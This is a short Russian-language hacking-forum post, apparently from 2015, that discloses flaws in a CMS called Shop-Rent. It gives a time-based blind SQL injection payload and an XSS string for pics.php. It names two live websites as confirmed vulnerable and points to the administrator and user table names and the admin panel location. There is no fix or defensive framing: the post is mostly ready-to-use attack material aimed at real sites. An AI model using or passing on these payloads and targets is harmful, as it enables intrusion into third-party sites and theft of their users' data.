09.03.2015, 12:43
|
|
Постоянный
Регистрация: 12.10.2011
Сообщений: 569
Провел на форуме:
178623
Репутация:
94
|
|
CMS Shop-Rent
Сайт: shop-rent.ru
Time-Based Blind SQL Injection (pics.php):
Код:
pics.php?id=1'+and+(select * from+(select(sleep(10)))x)+and--'1
XSS
Код:
pics.php?id=">alert();
Примеры:
Код:
http://disloc.ru/pics.php?id=1' and (select * from (select(sleep(10)))x) and--'1
TRUE
Код:
http://bookcoffee.ru/pics.php?id=215' and (select * from (select(sleep(10)))x) and--'1
TRUE
Таблица с администраторами: gd_main_users
Таблица с остальными пользователями: gd_users
Админ-панель: admin.site.ru
|
|
|